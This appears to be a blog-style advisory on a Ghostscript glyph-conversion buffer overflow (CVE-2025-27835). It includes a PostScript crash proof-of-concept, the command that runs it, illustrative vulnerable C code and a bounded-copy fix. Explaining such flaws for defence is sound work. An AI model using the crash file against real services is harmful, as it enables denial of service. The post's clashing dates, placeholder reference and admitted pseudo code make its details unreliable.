On March 12, 2024, a new vulnerability was identified in Artifex Ghostscript before version 10.05. Tracked as CVE-2025-27835, this security flaw is a buffer overflow triggered during the conversion of *glyphs to Unicode values* in the source file psi/zbfont.c.

This vulnerability could allow attackers to execute arbitrary code when processing malicious input files — typically PostScript or PDF files designed to trigger the overflow.

This post breaks down the root cause, shares simple proof-of-concept code, and gives tips for protecting your systems.

1. What is Ghostscript?

Artifex Ghostscript is a widely used interpreter for the PostScript language and for PDF files. It is integrated into many desktop tools, PDF viewers, and even online platforms.

- Impact: Potential remote code execution (RCE) via buffer overflow
- Component: Glyph-to-Unicode conversion (psi/zbfont.c)
- Affected versions: All before 10.05
- Fixed in: Ghostscript 10.05 (Release Notes)

References:

- Artifex Ghostscript Security Advisories
- CVE-2025-27835 NVD Entry (placeholder, as actual page may not exist yet)

3. Technical Explanation: Why the Overflow Happens

The vulnerability is found in the way zbfont.c converts glyph names to Unicode. The code did not validate buffer lengths correctly.

Simplified Vulnerable Code (zbfont.c)

```c
// Pseudo code similar to original, for illustration.
#include <string.h>

char buffer[32];               // fixed-size global destination, 31 chars + NUL

void convert_glyph(const char *src) {
    // Unsafe copy - does not check max size!
    strcpy(buffer, src);       // <-- Buffer overflow here if src > 31 bytes
    // ... process buffer ...
}
```

If an attacker crafts a glyph name longer than 31 bytes, it will overwrite memory adjacent to buffer. That could let them control program flow — especially in older systems compiled without stack protections.

4. Proof of Concept: Triggering the Overflow

Attackers can exploit this by submitting a PostScript or PDF file with a malicious glyph table.

Here is a minimal PostScript snippet (exploit.ps) to crash Ghostscript:

```postscript
%!
% Create a font with a very large glyph name.
10 dict dup begin
  /Encoding 256 array def
  % fill every code with the oversized name: for needs initial increment limit proc
  0 1 255 {Encoding exch /.longglyphnamelongglyphnamelongglyphname put} for
  /FontType 1 def
  /FontName /ExploitFont def
end
/ExploitFont exch definefont pop

% Try to use the glyph (triggers conversion)
/ExploitFont findfont 12 scalefont setfont
newpath 100 100 moveto (A) show
showpage
```

Explanation:
The glyph name 'longglyphnamelongglyphnamelongglyphname' is much longer than 32 bytes, so when Ghostscript reads it and converts it to Unicode, a buffer overflow occurs inside zbfont.c.

5. Real-World Exploitation: From Crash to Code Execution

In most modern systems, exploitation is hard due to stack canaries, ASLR, and other mitigations. But in some setups or older OSes, attackers can:

- Create a PostScript or PDF file with malicious glyph entries.
- Send or upload it to a parser or print service (like a web-to-PDF server, mail preview, or even a command-line process).

Example shell invocation:

```sh
ghostscript -dSAFER -sDEVICE=png16m -sOutputFile=out.png exploit.ps
```

In vulnerable Ghostscript versions, this will likely crash or cause memory corruption.

6. Fix & Detection

Official Fix:
The strcpy has been replaced with a safe function (like strncpy or memcpy with boundary checks) in Ghostscript 10.05.
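The bounded copy this fix describes, as an added example written for this post (not Ghostscript's actual patch): the same fixed-size buffer as the simplified vulnerable snippet in section 3, but filled only through a length-checked helper that refuses names that do not fit, including the oversized name from the PostScript snippet. GLYPH_NAME_MAX, copy_glyph_name and convert_glyph_safe are constructed names.

```c
/* Added example, not Ghostscript's code: a bounded glyph-name copy that
 * refuses names too long for the destination, in place of the unbounded
 * strcpy() pattern described above. All names and sizes are constructed. */
#include <stdio.h>
#include <string.h>

#define GLYPH_NAME_MAX 32   /* constructed: same 32-byte buffer as the simplified snippet */

/* Copies src into dst only if it fits together with its terminating NUL.
 * Returns 1 on success; returns 0 (and leaves dst empty) if src is too long.
 * Never reads more than dst_size bytes of src or writes past dst_size. */
int copy_glyph_name(char *dst, size_t dst_size, const char *src) {
    size_t len = 0;
    if (dst_size == 0)
        return 0;                           /* nothing can be stored, not even "" */
    while (len < dst_size && src[len] != '\0')
        len++;                              /* bounded scan: stops at dst_size */
    if (len == dst_size) {                  /* no room for the NUL: reject */
        dst[0] = '\0';
        return 0;
    }
    memcpy(dst, src, len + 1);              /* len bytes plus the NUL */
    return 1;
}

/* Same shape as the vulnerable convert_glyph(), but the buffer is only ever
 * filled through copy_glyph_name(). Returns the accepted name length, or -1
 * when the name is oversized and processing is refused. */
int convert_glyph_safe(const char *src) {
    char buffer[GLYPH_NAME_MAX];
    if (!copy_glyph_name(buffer, sizeof buffer, src))
        return -1;
    /* ... glyph name to Unicode lookup would run on buffer here ... */
    return (int)strlen(buffer);
}

int main(void) {
    /* constructed sample inputs: a normal glyph name and the oversized one
     * from the PostScript snippet above */
    const char *normal = "Aacute";
    const char *oversized = ".longglyphnamelongglyphnamelongglyphname";
    printf("%-42s -> %d\n", normal, convert_glyph_safe(normal));
    printf("%-42s -> %d\n", oversized, convert_glyph_safe(oversized));
    return 0;
}
```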

Mitigation Steps

- Update immediately: Download and install Ghostscript 10.05 or newer (Downloads).
- Scan your system: Look for old installations in /usr/bin/gs or /usr/local/bin/gs.
- Restrict input: Run Ghostscript with the -dSAFER option, but note this won’t prevent memory corruption from this bug.
- Monitor crash logs: Unexplained Ghostscript crashes with crafted PDFs/PS may signal attack attempts.

- Ghostscript Security Updates
- Release Notes 10.05.
- CVE-2025-27835 NVD Record
- Ghostscript GitHub – Fix Commit

8. Summary

CVE-2025-27835 is a serious overflow flaw in Ghostscript’s font code. Attackers can abuse it simply by sending a crafted PostScript or PDF file. While direct code execution is likely mitigated on newer systems, *denial of service* and further exploits in chained attacks are possible.

Prevention is simple: Always keep Ghostscript up-to-date. Scan for legacy installations in shared host environments (like print servers or PDF generation services), and consider sandboxing or containerizing risky workloads.

Stay safe – and remember, one outdated parsing tool can put your whole workflow at risk.

Timeline

Published on: 03/25/2025 21:15:43 UTC
Last modified on: 03/27/2025 16:45:46 UTC